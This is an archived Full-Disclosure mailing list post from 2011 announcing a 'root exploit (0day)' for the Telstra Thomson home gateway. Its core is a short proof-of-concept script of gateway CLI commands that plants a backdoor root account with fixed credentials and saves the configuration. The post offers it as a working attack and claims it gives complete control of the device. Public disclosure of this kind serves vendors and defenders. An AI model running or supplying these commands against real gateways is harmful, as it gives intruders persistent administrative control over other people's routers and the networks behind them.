[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Telstra thompson gateway - root exploit (0day)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Telstra thompson gateway - root exploit (0day)
From: xD 0x41 <secn3t@xxxxxxxxx>
Date: Fri, 29 Jul 2011 06:59:34 +1000

Telstra thompson gateway - root exploit

Telstra is an ISP here in Australia, it is also the same isp wich owns the
NBN

Author: Talon ( #haxnet member)


PoC script:

script add name addroot command user add name talon password talon role root
descr ROOT
script run name addroot pars
saveall


This would add a root user as talon:talon ,with complete control over the
gateway and anything running from it.
On behalf of talon, before it gets raped by some idling non @.
cheers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Telstra thompson gateway - root exploit (0day)
  - From: Jeremy Visser

Prev by Date: [Full-disclosure] PacSec CFP note, deadline Aug 3; conf Nov 9/10 Tokyo
Next by Date: [Full-disclosure] Sitecore CMS 6.4 Open URL Redirect Vulnerability
Previous by thread: [Full-disclosure] PacSec CFP note, deadline Aug 3; conf Nov 9/10 Tokyo
Next by thread: Re: [Full-disclosure] Telstra thompson gateway - root exploit (0day)
Index(es):
- Date
- Thread